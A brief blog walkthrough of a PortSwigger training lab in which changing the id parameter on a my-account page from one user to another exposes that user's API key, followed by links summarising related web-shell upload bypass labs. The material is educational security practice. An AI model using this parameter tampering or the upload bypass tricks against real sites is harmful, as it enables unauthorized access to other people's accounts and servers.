On this page
apsyleg1 min read
#portswigger #access-control #web-security
User ID Controlled by Request Parameter
Lab
User ID controlled by request parameter · Apprentice
Solution
Given
This lab has a horizontal privilege escalation vulnerability on the user account page.
To solve the lab, obtain the API key for the user carlos and submit it as the solution.
You can log in to your own account using the following credentials: wiener:peter
Analyzing the task
Looks like a very simple lab. We need to get the API key of user carlos. To do that we just have to change the user id passed to the route.
Recon
Log in as our user, look at the requests:
GET /my-account?id=wiener
The API key is here. Change the parameter to ?id=carlos:
GET /my-account?id=carlos
<div id=account-content>
<p>Your username is: carlos</p>
<div>Your API Key is: mxH4cyoguaAAuo3kCtqzv1ySjfORtagJ</div>
Lab solved.
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.